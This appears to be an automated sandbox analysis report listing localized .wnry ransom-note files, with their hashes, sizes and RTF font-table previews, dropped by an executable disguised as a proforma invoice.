                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}..{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}{\f54\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}@\'b1\'bc\'b8\'b2\'c3\'bc;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\fhim

                                                          C:\Users\user\Desktop\msg\m_filipino.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):37580
                                                          Entropy (8bit):5.0458193216786
                                                          Encrypted:false
                                                          SSDEEP:384:Sw3BHSj2cLeT+sPzy3EFHjHdi2MG2AGsi6p07i/eo75Y3kmA31dv61QyR:Sw3BHSWjHdGG2Axa7iGZrS14N
                                                          MD5:08B9E69B57E4C9B966664F8E1C27AB09
                                                          SHA1:2DA1025BBBFB3CD308070765FC0893A48E5A85FA
                                                          SHA-256:D8489F8C16318E524B45DE8B35D7E2C3CD8ED4821C136F12F5EF3C9FC3321324
                                                          SHA-512:966B5ED68BE6B5CCD46E0DE1FA868CFE5432D9BF82E1E2F6EB99B2AEF3C92F88D96F4F4EEC5E16381B9C6DB80A68071E7124CA1474D664BDD77E1817EC600CB4
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}..{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}{\f54\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}@\'b1\'bc\'b8\'b2\'c3\'bc;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}

                                                          C:\Users\user\Desktop\msg\m_finnish.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):38377
                                                          Entropy (8bit):5.030938473355282
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHdg2oG2l1glOmeo75Y3kmA31dv61QyB:Shef3jHdMG2l1AO3ZrS14l
                                                          MD5:35C2F97EEA8819B1CAEBD23FEE732D8F
                                                          SHA1:E354D1CC43D6A39D9732ADEA5D3B0F57284255D2
                                                          SHA-256:1ADFEE058B98206CB4FBE1A46D3ED62A11E1DEE2C7FF521C1EEF7C706E6A700E
                                                          SHA-512:908149A6F5238FCCCD86F7C374986D486590A0991EF5243F0CD9E63CC8E208158A9A812665233B09C3A478233D30F21E3D355B94F36B83644795556F147345BF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                          C:\Users\user\Desktop\msg\m_french.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):38437
                                                          Entropy (8bit):5.031126676607223
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHdtW2IG2sjqMeo75Y3kmA31dv61Qyg:Shef3jHd0G2smJZrS14M
                                                          MD5:4E57113A6BF6B88FDD32782A4A381274
                                                          SHA1:0FCCBC91F0F94453D91670C6794F71348711061D
                                                          SHA-256:9BD38110E6523547AED50617DDC77D0920D408FAEED2B7A21AB163FDA22177BC
                                                          SHA-512:4F1918A12269C654D44E9D394BC209EF0BC32242BE8833A2FBA437B879125177E149F56F2FB0C302330DEC328139B34982C04B3FEFB045612B6CC9F83EC85AA9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                          C:\Users\user\Desktop\msg\m_german.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):37181
                                                          Entropy (8bit):5.039739267952546
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHdN26G2VSA1Ieo75Y3kmA31dv61QyU:Shef3jHdfG2oe1ZrS14w
                                                          MD5:3D59BBB5553FE03A89F817819540F469
                                                          SHA1:26781D4B06FF704800B463D0F1FCA3AFD923A9FE
                                                          SHA-256:2ADC900FAFA9938D85CE53CB793271F37AF40CF499BCC454F44975DB533F0B61
                                                          SHA-512:95719AE80589F71209BB3CB953276538040E7111B994D757B0A24283AEFE27AADBBE9EEF3F1F823CE4CABC1090946D4A2A558607AC6CAC6FACA5971529B34DAC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                          C:\Users\user\Desktop\msg\m_greek.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):49044
                                                          Entropy (8bit):4.910095634621579
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHdc2oG2WWDFFG5BwKeo75Y3kmA31dv61QyM:Shef3jHdoG2NHG5BwLZrS14Q
                                                          MD5:FB4E8718FEA95BB7479727FDE80CB424
                                                          SHA1:1088C7653CBA385FE994E9AE34A6595898F20AEB
                                                          SHA-256:E13CC9B13AA5074DC45D50379ECEB17EE39A0C2531AB617D93800FE236758CA9
                                                          SHA-512:24DB377AF1569E4E2B2EBCCEC42564CEA95A30F1FF43BCAF25A692F99567E027BCEF4AACEF008EC5F64EA2EEF0C04BE88D2B30BCADABB3919B5F45A6633940CB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                          C:\Users\user\Desktop\msg\m_indonesian.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):37196
                                                          Entropy (8bit):5.039268541932758
                                                          Encrypted:false
                                                          SSDEEP:384:Sw3BHSj2cLeT+sPzy3EFHjHdY2oG2pq32eo75Y3kmA31dv61Qys:Sw3BHSWjHdUG2pq3nZrS14I
                                                          MD5:3788F91C694DFC48E12417CE93356B0F
                                                          SHA1:EB3B87F7F654B604DAF3484DA9E02CA6C4EA98B7
                                                          SHA-256:23E5E738AAD10FB8EF89AA0285269AFF728070080158FD3E7792FE9ED47C51F4
                                                          SHA-512:B7DD9E6DC7C2D023FF958CAF132F0544C76FAE3B2D8E49753257676CC541735807B4BEFDF483BCAE94C2DCDE3C878C783B4A89DCA0FECBC78F5BBF7C356F35CD
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}..{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}{\f54\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}@\'b1\'bc\'b8\'b2\'c3\'bc;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}

                                                          C:\Users\user\Desktop\msg\m_italian.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):36883
                                                          Entropy (8bit):5.028048191734335
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHdR2AG2c/EnByeo75Y3kmA31dv61Qy9:Shef3jHdJG2cQZrS14R
                                                          MD5:30A200F78498990095B36F574B6E8690
                                                          SHA1:C4B1B3C087BD12B063E98BCA464CD05F3F7B7882
                                                          SHA-256:49F2C739E7D9745C0834DC817A71BF6676CCC24A4C28DCDDF8844093AAB3DF07
                                                          SHA-512:C0DA2AAE82C397F6943A0A7B838F60EEEF8F57192C5F498F2ECF05DB824CFEB6D6CA830BF3715DA7EE400AA8362BD64DC835298F3F0085AE7A744E6E6C690511
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                          C:\Users\user\Desktop\msg\m_japanese.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):81844
                                                          Entropy (8bit):4.85025787009624
                                                          Encrypted:false
                                                          SSDEEP:384:SXZ0j2cKKwd1lksPzy3EFHjHdI2MG275rQeo75Y3kmA31dv61Qyr:SXZ0qbjHd4G2RNZrS14P
                                                          MD5:B77E1221F7ECD0B5D696CB66CDA1609E
                                                          SHA1:51EB7A254A33D05EDF188DED653005DC82DE8A46
                                                          SHA-256:7E491E7B48D6E34F916624C1CDA9F024E86FCBEC56ACDA35E27FA99D530D017E
                                                          SHA-512:F435FD67954787E6B87460DB026759410FBD25B2F6EA758118749C113A50192446861A114358443A129BE817020B50F21D27B1EBD3D22C7BE62082E8B45223FC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f11\fbidi \fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?l?r ??\'81\'66c};}{\f12\fbidi \froman\fcharset129\fprq2{\*\panose 02030600000101010101}\'b9\'d9\'c5\'c1{\*\falt Batang};}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}..{\f44\fbidi \froman\fcharset129\fprq2{\*\panose 020306000001

                                                          C:\Users\user\Desktop\msg\m_korean.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):91501
                                                          Entropy (8bit):4.841830504507431
                                                          Encrypted:false
                                                          SSDEEP:768:Shef3jHdUG2NQcbxfSVZiG9jvi3//ZVrMQr7pEKCHSI2DsY78piTDtTa6BxzBwdY:SheiaDq
                                                          MD5:6735CB43FE44832B061EEB3F5956B099
                                                          SHA1:D636DAF64D524F81367EA92FDAFA3726C909BEE1
                                                          SHA-256:552AA0F82F37C9601114974228D4FC54F7434FE3AE7A276EF1AE98A0F608F1D0
                                                          SHA-512:60272801909DBBA21578B22C49F6B0BA8CD0070F116476FF35B3AC8347B987790E4CC0334724244C4B13415A246E77A577230029E4561AE6F04A598C3F536C7E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                          C:\Users\user\Desktop\msg\m_latvian.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):41169
                                                          Entropy (8bit):5.030695296195755
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHdcqH24G2ZN1EDCv3Apb0WD5gYV/S4L3rnzdeo75Y3f:Shef3jHdcMG2NpZrS14F
                                                          MD5:C33AFB4ECC04EE1BCC6975BEA49ABE40
                                                          SHA1:FBEA4F170507CDE02B839527EF50B7EC74B4821F
                                                          SHA-256:A0356696877F2D94D645AE2DF6CE6B370BD5C0D6DB3D36DEF44E714525DE0536
                                                          SHA-512:0D435F0836F61A5FF55B78C02FA47B191E5807A79D8A6E991F3115743DF2141B3DB42BA8BDAD9AD259E12F5800828E9E72D7C94A6A5259312A447D669B03EC44
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                          C:\Users\user\Desktop\msg\m_norwegian.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):37577
                                                          Entropy (8bit):5.025836823617116
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHdy2MG2D7mgwroXeo75Y3kmA31dv61Qy5:Shef3jHdGG23KrDZrS14N
                                                          MD5:FF70CC7C00951084175D12128CE02399
                                                          SHA1:75AD3B1AD4FB14813882D88E952208C648F1FD18
                                                          SHA-256:CB5DA96B3DFCF4394713623DBF3831B2A0B8BE63987F563E1C32EDEB74CB6C3A
                                                          SHA-512:F01DF3256D49325E5EC49FD265AA3F176020C8FFEC60EB1D828C75A3FA18FF8634E1DE824D77DFDD833768ACFF1F547303104620C70066A2708654A07EF22E19
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                          C:\Users\user\Desktop\msg\m_polish.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):39896
                                                          Entropy (8bit):5.048541002474746
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHdD2SG2gA8w8OJ6868jy8/8w8m8T848f8y858l8j8yv:Shef3jHdxG2KhuZrS14G
                                                          MD5:E79D7F2833A9C2E2553C7FE04A1B63F4
                                                          SHA1:3D9F56D2381B8FE16042AA7C4FEB1B33F2BAEBFF
                                                          SHA-256:519AD66009A6C127400C6C09E079903223BD82ECC18AD71B8E5CD79F5F9C053E
                                                          SHA-512:E0159C753491CAC7606A7250F332E87BC6B14876BC7A1CF5625FA56AB4F09C485F7B231DD52E4FF0F5F3C29862AFB1124C0EFD0741613EB97A83CBE2668AF5DE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                          C:\Users\user\Desktop\msg\m_portuguese.wnry

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):37917
                                                          Entropy (8bit):5.027872281764284
                                                          Encrypted:false
                                                          SSDEEP:384:SheftipUENLFsPzy3EFHjHdy2QG2xgk5eo75Y3kmA31dv61QyV:Shef3jHdCG2EZrS14p
                                                          MD5:FA948F7D8DFB21CEDDD6794F2D56B44F
                                                          SHA1:CA915FBE020CAA88DD776D89632D7866F660FC7A
                                                          SHA-256:BD9F4B3AEDF4F81F37EC0A028AABCB0E9A900E6B4DE04E9271C8DB81432E2A66
                                                          SHA-512:0D211BFB0AE953081DCA00CD07F8C908C174FD6C47A8001FADC614203F0E55D9FBB7FA9B87C735D57101341AB36AF443918EE00737ED4C19ACE0A2B85497F41A
                                                          Malicious:false
                                                          Reputation:unknown
